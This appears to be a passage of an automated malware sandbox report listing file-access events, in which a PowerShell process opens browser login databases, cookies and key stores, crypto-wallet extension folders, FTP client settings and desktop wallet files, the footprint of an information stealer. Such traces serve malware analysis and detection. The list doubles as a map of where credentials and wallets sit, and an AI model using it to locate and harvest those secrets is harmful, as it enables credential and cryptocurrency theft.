Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\logins.json
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\prefs.js
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cert9.db
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\key4.db
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT